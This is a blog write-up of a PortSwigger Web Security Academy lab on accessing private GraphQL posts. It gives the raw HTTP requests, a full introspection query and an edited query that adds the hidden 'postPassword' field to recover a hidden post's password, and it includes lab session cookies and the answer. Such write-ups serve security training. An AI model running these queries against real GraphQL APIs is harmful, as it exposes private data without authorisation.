Skip to content

chojnowski.it

Port Swigger Accessing private GraphQL posts

Port Swigger Accessing private GraphQL posts

Accessing private GraphQL posts¶

Solution¶

Open website: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net/graphql/v1¶

POST /graphql/v1 HTTP/2
Host: 0ad40088034d63e9804f5858004e004c.web-security-academy.net
Cookie: session=No0faruHvddyi3OsArneBu96UZN6wxty
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net/post?postId=4
Content-Type: application/json
Content-Length: 249
Origin: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

{"query":"\n    query getBlogPost($id: Int!) {\n        getBlogPost(id: $id) {\n            image\n            title\n            author\n            date\n            paragraphs\n        }\n    }","operationName":"getBlogPost","variables":{"id":4}}

Set Set introspection query¶

GraphQL > Set introspection query
---
POST /graphql/v1 HTTP/2
Host: 0ad40088034d63e9804f5858004e004c.web-security-academy.net
Cookie: session=No0faruHvddyi3OsArneBu96UZN6wxty
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net/post?postId=4
Content-Type: application/json
Content-Length: 1404
Origin: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

{"query":"query IntrospectionQuery {\n    __schema {\n        queryType {\n            name\n        }\n        mutationType {\n            name\n        }\n        subscriptionType {\n            name\n        }\n        types {\n            ...FullType\n        }\n        directives {\n            name\n            description\n            locations\n            args {\n                ...InputValue\n            }\n        }\n    }\n}\n\nfragment FullType on __Type {\n    kind\n    name\n    description\n    fields(includeDeprecated: true) {\n        name\n        description\n        args {\n            ...InputValue\n        }\n        type {\n            ...TypeRef\n        }\n        isDeprecated\n        deprecationReason\n    }\n    inputFields {\n        ...InputValue\n    }\n    interfaces {\n        ...TypeRef\n    }\n    enumValues(includeDeprecated: true) {\n        name\n        description\n        isDeprecated\n        deprecationReason\n    }\n    possibleTypes {\n        ...TypeRef\n    }\n}\n\nfragment InputValue on __InputValue {\n    name\n    description\n    type {\n        ...TypeRef\n    }\n    defaultValue\n}\n\nfragment TypeRef on __Type {\n    kind\n    name\n    ofType {\n        kind\n        name\n        ofType {\n            kind\n            name\n            ofType {\n                kind\n                name\n            }\n        }\n    }\n}"}
---
query IntrospectionQuery {
    __schema {
        queryType {
            name
        }
        mutationType {
            name
        }
        subscriptionType {
            name
        }
        types {
            ...FullType
        }
        directives {
            name
            description
            locations
            args {
                ...InputValue
            }
        }
    }
}

fragment FullType on __Type {
    kind
    name
    description
    fields(includeDeprecated: true) {
        name
        description
        args {
            ...InputValue
        }
        type {
            ...TypeRef
        }
        isDeprecated
        deprecationReason
    }
    inputFields {
        ...InputValue
    }
    interfaces {
        ...TypeRef
    }
    enumValues(includeDeprecated: true) {
        name
        description
        isDeprecated
        deprecationReason
    }
    possibleTypes {
        ...TypeRef
    }
}

fragment InputValue on __InputValue {
    name
    description
    type {
        ...TypeRef
    }
    defaultValue
}

fragment TypeRef on __Type {
    kind
    name
    ofType {
        kind
        name
        ofType {
            kind
            name
            ofType {
                kind
                name
            }
        }
    }
}

Edit GraphQL query¶

Edit query and add "postPassword"
Edit variable set id: 3
Found password: 3bnpflnd5u8giovm6vm7b4631hep4e4i
---
POST /graphql/v1 HTTP/2
Host: 0ad40088034d63e9804f5858004e004c.web-security-academy.net
Cookie: session=No0faruHvddyi3OsArneBu96UZN6wxty
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net/post?postId=4
Content-Type: application/json
Content-Length: 273
Origin: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

{"query":"\n    query getBlogPost($id: Int!) {\n        getBlogPost(id: $id) {\n            image\n            title\n            author\n            date\n            paragraphs\n          postPassword\n        }\n    }","operationName":"getBlogPost","variables":{"id":3}}
---

    query getBlogPost($id: Int!) {
        getBlogPost(id: $id) {
            image
            title
            author
            date
            paragraphs
          postPassword
        }
    }

Input correct password¶

Password: 3bnpflnd5u8giovm6vm7b4631hep4e4i

Solved¶